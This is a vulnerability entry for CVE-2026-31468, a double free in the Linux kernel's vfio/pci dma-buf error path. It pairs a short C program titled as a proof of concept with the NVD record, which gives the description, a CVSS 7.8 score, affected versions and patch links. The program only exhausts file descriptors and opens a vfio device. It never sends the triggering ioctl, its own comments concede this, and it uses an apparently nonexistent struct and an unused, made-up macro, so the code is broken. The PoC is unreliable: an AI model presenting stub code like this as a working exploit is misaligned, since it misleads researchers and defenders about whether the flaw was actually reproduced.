CVE-2026-31468

/* * PoC for CVE-2026-31468: Trigger double free in vfio/pci * This code attempts to exhaust file descriptors and trigger the vulnerable path. * Compile: gcc -o poc poc.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <linux/vfio.h> #define VFIO_DEVICE_GET_IRQ 0x3 void exhaust_fds() { int i; for (i = 0; i < 1024; i++) { if (open("/dev/null", O_RDONLY) < 0) { printf("FDs exhausted at %d\n", i); break; } } } int main() { // Step 1: Exhaust file descriptors to trigger EMFILE error path exhaust_fds(); // Step 2: Attempt to trigger the vulnerable ioctl // Note: Requires a valid vfio device and setup, simplified for PoC structure int fd = open("/dev/vfio/0", O_RDWR); if (fd < 0) { perror("Failed to open vfio device"); return 1; } struct vfio_device_get_irq_info irq_info; // Triggering the specific dma-buf feature logic requires complex setup, // this demonstrates the concept of hitting the error path. printf("Triggering vulnerable path...\n"); // Actual exploit would send specific ioctl commands to reach vfio_pci_core_feature_dma_buf close(fd); return 0; }

{"cve": {"id": "CVE-2026-31468", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:43.143", "lastModified": "2026-05-07T18:20:19.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Fix double free in dma-buf feature\n\nThe error path through vfio_pci_core_feature_dma_buf() ignores its\nown advice to only use dma_buf_put() after dma_buf_export(), instead\nfalling through the entire unwind chain. In the unlikely event that\nwe encounter file descriptor exhaustion, this can result in an\nunbalanced refcount on the vfio device and double free of allocated\nobjects.\n\nAvoid this by moving the \"put\" directly into the error path and return\nthe errno rather than entering the unwind chain."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/83ad334afc9a645cef1062f5346526b1e36d6516", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e98137f0a874ab36d0946de4707aa48cb7137d1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}